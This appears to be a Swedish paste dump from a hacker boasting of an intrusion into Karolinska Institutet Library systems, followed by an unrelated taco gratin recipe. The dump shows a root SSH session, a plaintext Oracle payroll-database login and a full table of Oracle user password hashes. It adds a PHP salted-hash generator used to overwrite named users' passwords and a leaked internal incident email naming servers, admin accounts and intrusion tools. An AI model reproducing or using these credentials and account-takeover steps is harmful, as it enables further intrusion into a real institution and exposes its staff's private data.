  2101. fs04rogu fs04rogu fs04rogu fs04rogu fs04than fs04than fs04than fs04than
  2102. fs04vida fs05alka fs05alka fs05anek fs05anek fs05anek fs05anek fs05anek
  2103. fs05anek fs05ankj fs05anod fs05anod fs05anod fs05anwa fs05anwa fs05chba
  2104. fs05chba fs05chba fs05chba fs05chba fs05chba fs05chba fs05chba fs05clre
  2105. fs05daag fs05daer fs05emhe fs05emsa fs05emsa fs05emsa fs05emsa fs05emsa
  2106. fs05emsa fs05emsa fs05emsv fs05emsv fs05erha fs05erka fs05erro fs05frar
  2107. fs05gued fs05gued fs05gued fs05gued fs05jian fs05jobe fs05jobe fs05jobj
  2108. fs05jobj fs05jola fs05jola fs05kasv fs05kasv fs05lara fs05ligo fs05ligo
  2109. fs05ligo fs05ligo fs05ligo fs05ligo fs05ligo fs05ligo fs05ligo fs05ligo
  2110. fs05mais fs05masv fs05mimo fs05mimo fs05mimo fs05mimo fs05nimo fs05nimo
  2111. fs05nimo fs05olli fs05pehi fs05pehi fs05pehi fs05pehi fs05pehi fs05pehi
  2112. fs05sajo fs05saod fs05saod fs05saod fs05saod fs05saod fs05sice fs05sika
  2113. fs05soas fs05soas sal3
  2114.  
  2115. #######
  2116. # 004 #
  2117. #######
  2118.  
  2119. [root@proxy root]# ssh jellycat
  2120. Debian GNU/Linux 3.1
  2121.  
  2122. ########################################################
  2123.  
  2124. Only for staff at the Library of Karolinska Institutet.
  2125. Unauthorized access is prohibited. All access is logged.
  2126.  
  2127. ########################################################
  2128. Password:
  2129. Last login: Tue Dec 19 13:02:25 2006
  2130. jellycat:~#
  2131.  
  2132. #
  2133. # efter att hackern kollat runt hittar han information s�som l�sen till oracle databasen f�r l�nesystemet, sysdumpar m.m. enjoy
  2134. #
  2135.  
  2136. agrprod / c0ncentrat @agrp
  2137.  
  2138.  
  2139. 1.
  2140. SQL> select username,password from dba_users;
  2141. 2.
  2142.  
  2143. 3.
  2144. USERNAME PASSWORD
  2145. 4.
  2146. ------------------------------ ------------------------------
  2147. 5.
  2148. AGRSUP D5FA8C24BF0E374D
  2149. 6.
  2150. AGRKI3 D65EBFEE18241F45
  2151. 7.
  2152. AGRPROD AF4FB1517E8D5318
  2153. 8.
  2154. MDDATA DF02A496267DEE66
  2155. 9.
  2156. DIP CE4A36B8E06CA59C
  2157. 10.
  2158. SCOTT F894844C34402B67
  2159. 11.
  2160. TSMSYS 3DF26A8B17D0F29F
  2161. 12.
  2162. DBSNMP 447503C065F86789
  2163. 13.
  2164. SYSMAN 9A5BB490BCF5D8A4
  2165. 14.
  2166. MDSYS 72979A94BAD2AF80
  2167. 15.
  2168. ORDSYS 7EFA02EC7EA6B86F
  2169. 16.
  2170.  
  2171. 17.
  2172. USERNAME PASSWORD
  2173. 18.
  2174. ------------------------------ ------------------------------
  2175. 19.
  2176. CTXSYS 71E687F036AD56E5
  2177. 20.
  2178. ANONYMOUS anonymous
  2179. 21.
  2180. EXFSYS 66F4EF5650C20355
  2181. 22.
  2182. DMSYS BFBA5A553FD9E28A
  2183. 23.
  2184. WMSYS 7C9BA362F8314299
  2185. 24.
  2186. XDB 88D8364765FCE6AF
  2187. 25.
  2188. ORDPLUGINS 88A2B2C183431F00
  2189. 26.
  2190. SI_INFORMTN_SCHEMA 84B8CBCA4D477FA3
  2191. 27.
  2192. OLAPSYS 3FB8EF9DB538647C
  2193. 28.
  2194. MGMT_VIEW 4F538DF5F344F348
  2195. 29.
  2196. SYS 34C5AD88044655EA
  2197. 30.
  2198.  
  2199. 31.
  2200. USERNAME PASSWORD
  2201. 32.
  2202. ------------------------------ ------------------------------
  2203. 33.
  2204. SYSTEM 203C7034AAC39944
  2205. 34.
  2206. OUTLN 4A3BA55E08595C81
  2207. 35.
  2208.  
  2209. 36.
  2210. 24 rader.
  2211. 37.
  2212.  
  2213. 38.
  2214. SQL>
  2215.  
  2216. salt = jDAP
  2217. pass = Passion4Pain
  2218.  
  2219.  
  2220.  
  2221. $result = sha1(Passion4Pain)
  2222.  
  2223.  
  2224. $pass = base64encode($result);
  2225. $salt = base64encode($salt);
  2226.  
  2227.  
  2228. fds:~$ ./gen.php Passion4Pain
  2229. Password: Passion4Pain Salt: 775a
  2230. Password encoded: +ocWukTyghjnlycUX1ZQOThC2eg= Salt encoded: Nzc1YQ==
  2231.  
  2232.  
  2233.  
  2234. PWD_VARIANT == 4
  2235.  
  2236.  
  2237. replacing user: JENNLENN
  2238.  
  2239. old_hash: EFsEsNercvSmSQr07Zk5ow47nHE=
  2240. old_salt: U1knMCBa
  2241. Passion64
  2242.  
  2243.  
  2244.  
  2245. mzzZY
  2246. zj3ryDKDpLNw1DqzR8qygMeo8aY=
  2247.  
  2248. JANESVEN
  2249. old_salt: 6gVSg8VBhOY=
  2250. old_pass: zj3ryDKDpLNw1DqzR8qygMeo8aY=
  2251.  
  2252.  
  2253. #!/usr/bin/env php
  2254. <?
  2255.  
  2256. if($argc < 2)
  2257. die("./gen.php <password>\n");
  2258.  
  2259. $pass = $argv[1];
  2260. $salt = substr(md5(rand()), 0, 4);
  2261.  
  2262. printf("Password: " . $pass . " Salt: " . $salt ."\n");
  2263. $hash = sha1($pass . $salt, 1);
  2264.  
  2265. $hash64 = base64_encode($hash);
  2266. $salt64 = base64_encode($salt);
  2267.  
  2268.  
  2269. printf("Password encoded: " . $hash64 . " Salt encoded: " . $salt64 . "\n");
  2270.  
  2271.  
  2272. ?>
  2273.  
  2274. # mailinfiltrering efter dataintr�ng �r tufft.
  2275.  
  2276. Hej!
  2277.  
  2278. Vi uppt�ckte idag att tv� konton AD\admin och STUDENT\admin verkar ha varit inblandade i ett omfattade hackningsf�rs�k
  2279. mot v�ra dom�ner (KIBNET och STUDENT).
  2280.  
  2281. Vi kommer att komma med en detaljerad rapport n�r vi utrett saken till fullo under de n�rmaste dagarna.
  2282.  
  2283. Vi rekommenderar starkt att ni disablar eller tar bort kontot admin p� ADKI, eller i minsta fall s�tter ett nytt l�sneord
  2284.  
  2285. P� det om det mot f�rmodan �r ett legitimt konto.
  2286.  
  2287. Vi har haft motsvarande konton p� KIBNET (domain admin) och i STUDENT-dom�nen (det kontot �r medlem i enterprise admins),
  2288.  
  2289. det senare loggade senast in ig�r p� v�r STUDENT-DC STUD03 ig�r 01:37 inatt (det kontot �r disablat och kommer att tas bort n�r vi unders�kt klart).
  2290.  
  2291. Det verkar som om admin-kontot i STUDENT och KIBNET-dom�nen �r skapat 2007-04-22 och det �r d�r n�gonstans som detta hack har b�rjar, sedan har vi kunnat sp�ra inloggningar som �gt rum under sommaren (maj, juni, juli, aug och nu i september).
  2292.  
  2293. Verktyg som vi har hittat sp�r av �r Cain & Abel, Pwdump 6, rcontrol.exe, fgdump, cachedump, winpcap och svchostt.exe.
  2294.  
  2295. Ni kan hitta lite sp�r i loggarna p� ADKI efter misslyckade inloggningsf�rs�k med konton janeng och ulfper (men det �r vi som har gjort dessa ; )
  2296.  
  2297. De av v�ra servrar som vi kan se att n�got av (KIBNET\STUDENT\AD) admin-kontona varit inne p� �r f�ljande:
  2298.  
  2299. WHALE 2007-09 (11, 13)
  2300. EEL 2007-06-09 (fler datum) rdp mot mom
  2301. MOM 2007-06-21
  2302. MM 2007-05-24 22:51, varit inne p� tiltpoker h�r ocks�
  2303. ORDER3 2007-06-13 (Full Tilt Poker)
  2304. STONEFISH 2007-06-14
  2305. TUNA 2007-05-24 kl 23:25
  2306.  
  2307. STUD03 2007-05-18 (cachedump och cain), �ven inloggad 16/9 fr�n jellycat
  2308. STUD02 2007-04-22
  2309. STUD01
  2310. TREO 2007-07-15
  2311. STUDENT-00 2007-08-23
  2312.  
  2313. Nedan utdrag fr�n s�kerhetsloggen p� v�r VPN-server EEL:
  2314.  
  2315. Event Type: Success Audit
  2316. Event Source: Security
  2317. Event Category: Logon/Logoff
  2318. Event ID: 528
  2319. Date: 2007-05-10
  2320. Time: 02:37:06
  2321. User: AD\admin
  2322. Computer: EEL
  2323. Description:
  2324. Successful Logon:
  2325. User Name: admin
  2326. Domain: AD
  2327. Logon ID: (0x0,0x8022A)
  2328. Logon Type: 2
  2329. Logon Process: Advapi
  2330. Authentication Package: Negotiate
  2331. Workstation Name: EEL
  2332. Logon GUID: {72b03c9c-90c4-0a75-dfa5-795fa554194b}
  2333. Caller User Name: EEL$
  2334. Caller Domain: KIBNET
  2335. Caller Logon ID: (0x0,0x3E7)
  2336. Caller Process ID: 460
  2337. Transited Services: -
  2338. Source Network Address: -
  2339. Source Port: -
  2340.  
  2341. Mvh/
  2342. Janne
  2343.  
  2344. #######
  2345. # 005 #
  2346. #######
  2347.  
  2348. Tacograt�ng v2 (3-4personer)
  2349.  
  2350. 1x 400g k�ttf�rs
  2351. 1x tacokryddmix
  2352. 1x philadelphia naturel
  2353. 1x creme fresch
  2354. 1x riven grat�ngost
  2355. 1x R�d/gul papripka
  2356. 1x gull�k
  2357.  
  2358. 1x Tacochips Chili, Ost eller naturell
  2359.  
  2360. 1. st�ll in ugnen p� 225C
  2361. 2. blanda philadelpia och creme fresch
  2362. i en ugnsform med en gaffel
  2363. 3. stek k�ttf�rsen hacka samtidigt l�ken i k�ket och paprikan r�tt sm�tt och h�ll p� kryddan,
  2364. l�gg i k�ttf�rsen j�mnt i formen
  2365. 5. l�gg p� grat�ngosten
  2366. 6. st�ll in den i ugnen i ca 20-25min
  2367.  
Advertisement
Add Comment
Please, Sign In to add comment